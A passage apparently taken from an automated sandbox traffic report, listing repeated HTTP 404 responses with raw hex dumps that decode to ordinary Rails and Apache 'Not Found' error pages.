72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0x-runtime: 0.045185content-length: 18187connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0x-runtime: 0.029447content-length: 18207connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097x-runtime: 0.025147content-length: 28287connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:11 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:14 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 